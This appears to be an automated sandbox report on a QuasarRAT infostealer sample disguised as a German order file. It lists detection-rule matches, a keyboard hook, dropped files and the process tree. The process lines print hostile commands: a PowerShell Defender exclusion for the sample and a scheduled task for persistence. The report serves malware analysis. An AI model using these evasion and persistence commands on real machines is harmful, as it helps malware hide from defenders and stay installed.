Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, outlooks.exe, 00000016.00000002.3874269347.00000000033E2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, outlooks.exe, 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
Source: Bestellung - 021224 - 901003637.exe, outlooks.exe.9.dr, eNuXmIwkixzW.exe.0.dr | String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | HTTPS traffic detected: 103.126.138.87:443 -> 192.168.2.8:49716 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe

                E-Banking Fraud

                Source: Yara match | File source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 0000000A.00000002.1683887266.00000000026A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.1555939194.00000000033C3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000F.00000002.1685100686.00000000033FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000016.00000002.3874269347.0000000003642000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.1477097522.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1464511092.00000000039F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000D.00000002.1578699518.0000000004BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 6052, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Bestellung - 021224 - 901003637.exe PID: 2288, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: eNuXmIwkixzW.exe PID: 3020, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 3648, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 4936, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: outlooks.exe PID: 6088, type: MEMORYSTR

                System Summary

                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects QuasarRAT malware Author: Florian Roth
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Quasar infostealer Author: ditekshen
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Process Stats: CPU usage > 49%
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC2290
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC7374
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC2029
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC2280
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FCA4C2
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC29C8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC2B90
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC2B81
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC3378
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC35D0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC36C0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1AAA
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1A14
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1B9C
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1B29
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1CA7
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1E3A
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1E03
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_00FC1FE2
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_05049AD0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_05040F94
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_0504E82F
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_0504E859
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_0504E868
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_05043930
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_05043940
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_05049AC1
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_0980E220
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_098005B8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_09801628
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_09808B10
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_09808B20
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_09809F28
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_0980A360
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_098082B0
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_0980826F
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_098086D8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 0_2_098086E8
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Code function: 9_2_016DF03C
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B62290
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B67374
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B6A4C2
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B62029
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B629C8
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B62B90
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B636D0
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B636C0
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B63378
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61CA7
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61E3A
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61E03
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61FE2
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61AAA
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61A14
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61B9C
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 10_2_04B61B29
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03212290
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03217374
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_032121F5
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03212029
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_0321A4C3
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03212B81
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03212B90
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_032136C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_032136D0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211B29
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211B9C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211A14
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211AAA
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211FE2
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211E3A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211E03
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_03211CA7
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_0893D3C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_089305B8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_08931628
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_08938B10
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_08938B20
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_08939F28
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_0893829A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_089382B0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_0893A360
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_0893F4E0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_089386D8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 13_2_089386E8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F2290
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F7374
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F2029
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032FA4C3
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F2B82
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F2B90
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F29C8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F3378
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F36C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F35C2
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F35D0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1B29
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1B9C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1A14
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1AAA
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1FE2
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1E3A
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1E03
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_032F1CA7
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_0886D3C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_08868B10
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_08868B20
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_08869F28
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_088682A0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_088682B0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_0886A360
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_0886F4E0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_088686D8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 15_2_088686E8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 22_2_0193F03C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 22_2_082AB2C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 22_2_082A7E48
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe | Code function: 34_2_02B5F03C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe | Code function: 35_2_016DF03C
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: invalid certificate
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1493155873.0000000007F40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000041F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1492517755.0000000007920000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1446947116.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exeBinary or memory string: OriginalFilenameHkfr.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@49/37@2/2
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMutant created: \Sessions\1\BaseNamedObjects\Local\532aca2b-96ff-44aa-9213-031e975919ac
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB9B7.tmpJump to behavior
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Bestellung - 021224 - 901003637.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Bestellung - 021224 - 901003637.exeReversingLabs: Detection: 47%
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile read: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeJump to behavior
Source: unknown | Process created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe | Process created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
